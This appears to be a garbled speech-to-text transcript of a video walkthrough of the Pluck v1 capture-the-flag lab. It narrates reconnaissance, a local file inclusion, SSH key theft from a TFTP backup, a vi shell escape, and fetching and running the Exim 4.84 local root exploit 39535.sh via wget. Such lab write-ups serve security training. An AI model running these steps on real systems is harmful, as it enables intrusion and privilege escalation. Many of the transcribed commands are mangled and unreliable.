Hello guys, welcome back to a Pentesters Club. Today we're going to solve another CTF challenge named called Pluck version 1. So what is the basic penetration testing methodologies we used here? So the basic penetration testing methodologies we used here: network discovery, enumeration, exploration, privilege escalation and capture the flag. So first open the terminal. So you just type here sudo su, enter your password, then you just type here net discover type is 0. So first we would like to identify our network hosting machine. So I identify my target machine is here. So you just quit now, you just type here nmap minus -34 minus a is an aggressive scan and enter your targeted IP address. So now let's wait for the nmap result. So I hope, yes, I got the nmap result. One is available with SSH, another one is available with AP. So now we would like to go to, first we would like to go with the directory buster. New tab, just type with the directory buster. HTTP, enter your targeted IP address 192.168.18.85. Let's go. Now open new tab. You just go with the nicto minus h. Enter your targeted IP address 192.168.18.85. So once this is come, now you would like to enter your targeted IP address 192.168.18.85. So here I can see only a pluck. So we would like to look the page source, and nothing else. Main.js. Okay, so there is nothing else. So we would like to quit this. So come back here. So here I got index.php with the local file inclusion. So that's better. Here nothing else. So I would like to use here as index.php with the local file inclusion. So where is this? Index.php. So this I would like to utilize. So just copy, come back here, then paste it here. Now I have got here. So you can look here, backups.sh. So home a Paul. So we consider username as Paul. So here you can see home Peter bin bash with a Paul. So now we would like to go here. So where we would like to look here in this, so we would like to look the pesos first. One is power. So this I would like to get here. Uh, so I would like to get the backup. So I just copy this, copy. So one more time I would like to copy, come back here. So I would like to replace the etc places as user local script backup.sh. So here I got it as backup, server backup scripts and backups. So we can get it via TFTP, echo, and backupping data tar and CF. So we have TFTP, then we would like to get it from there. Now let's go to a TFTP. So we would like to utilize this one. So just type clear. So just type here TFTP. Enter your target IP address 192.168.18.85. So we are successfully logged in here. So we just type here get. We would like to look here as this one, backup.tab. So just copy, come back here and paste it. So I think I have successfully received. Then I just quit now, just type a list. So here, so now I just type here tar minus xvf. Now specify this one. So just copy and paste it. I have got it, so just type here. Now just type list. Where is this? So here, so I just need to delete here. So just type here remove minus rf as sorry, I would like to remove because I will get a lot of confusion here. Rf. Now again remove minus rf where, that's better. So just type here. So I would like to get make directory as backups list. Okay. Now we would like to go back here. I would like to get it all here. Okay, so I just move this one as to a backup dot data to a backups. Now just copy this one, copy. I just type here a cd a backups list. So just paste it. So I have successfully got it here. So now I just type here. Now just type ls cd o ls minus l. So here I have got all the three users. Now I would like to enumerate all the three users first. So we are looking only the Bob. So we would like to look first at Bob ls minus here. So nothing else. Come back cd a Bob ls minus here. Here have some interesting cd a keys ls minus here. So which key we would like to copy, or we would like to look here. So we would like to look here. So just type here cat id underscore key1 cat id underscore key1 dot pop. So it's Paul Pluck. So which one is going to be worked out? I really don't know. So let it's maybe a same thing or a different. Let we would like to look. It's same similar. He make here for confusion. For yes, this one because it's all very short. So I would like to utilize this one because I think it's the right key. Now I would like to look here. 4.pub. Yes, this and all it's very big. So this is very smart and very little bit left. Now let me compare with the fifth one. This is also a big. Now let me the fifth one is big. So let me clear all those things here. So here I have got it here in the case. So now we would like to look here as cd. Now just type here ls minus here cd Peter ls minus here. So nothing else. So now we just go to a cd a Paul. Oh sorry, cd Paul. I just type here ls minus here cd a keys Just type clear. So it's already have uh, the CHM body was given the permission. So now we can log in directly from here. So without wasting, so just type here as such Paul at the rate, enter your targeted IP address 18.85. So I just need to specify minus ID underscore key 4. It's asking permission, you just type yes. Permission is denied. So the permission is denied. So I would like to write here as clear. So just type here chmod 600 id underscore a key 4. Now we would like to try here. So I have got it here. So it's came to another directory thing. So it's like a directory listing. So we would like to look total 4 directory listing. Okay, change a directory. So edit a file. So in the edit a file, I have got some useful information. So what I would like to edit here. So it's like a VI editor. So I just type here as set shell equal to bin bash. So here I have got it here something. So you just type here like, so it's not, yes it was typing now. So you just type here as a shell. So again it's came the same way. So you just type here as now you just type here as set equal to shell equal to bin bash. Now again you just type as here shell. Now I have successfully logged in. So it's a little bit complicated. So we just need to understand very clearly here. Now we just try here. We just type here ID. We got it as Paul. Now you just type list. So it's only have keys. So we have already seen and backup all those things. Now you would like to type here cd list minus here. Here have nothing else. So again we would like to go to a cd. Now just type here list minus here. So now we would like to find some useful information to get a directly and a root privilege access. So you just type as a find minus prm minus u equal to s minus type f r2 is greater than dev r null. So now we would like to look what we can get it here. So you can see here user xsim bin xsim 4.84.84-7. So we would like to target here. So we would like to walk to this. So you just type here as xsim copy, come back to here. So you just type clear. I just type as such exploit xim 4. No, it's never get it like this. So I would like to get 4.8.4. Yes, I have got this one. So now I would like to take as uh, local privilege escalations. So xim 4.84. So this is I would like to get this. So just copy this one. You just type allocate, then paste it. So here it's available. So you just copy this one. You just type get, paste it. So you have got this exploit everything here. So now we would like to go to a temp directory. So you just type here cd a temp directory ls minus air, nothing else. So you just type as nano exploit.sh. So it's not work out. Otherwise, okay, no need to worry. Uh, Better, I would like to do one thing. So you just entirely copy this one. You just type clear. So now what you would like to do here is uh, now you just type here as exploit minus m and paste in this one. We have successfully got it here. I just type list. So just type here python minus m http dot server. Now let me, I would like to look my IP address. I have config. This is my IP address. So just type here wget http. Enter your targeted IP address 192.168.18.35 and 8000. So this is an exploit name. So 39535.sh. So just paste it. I have successfully got this exploit. So you can type ls minus l. So you not yet give a permission. So just type here chmod plus x 39535.sh. Now just type as again you just type here ls minus l. So now just run this 39535.sh. So local a root exploit. I have successfully got the root privilege access. So just type id. We got it. So just type here who am I? We are in the root directory. So now let's walk to the cd root ls minus a. We got it here. So just type here cat flag.txt. So I have successfully completed this lab. So you try it your own guys. Thank you guys for watching and keep smiling.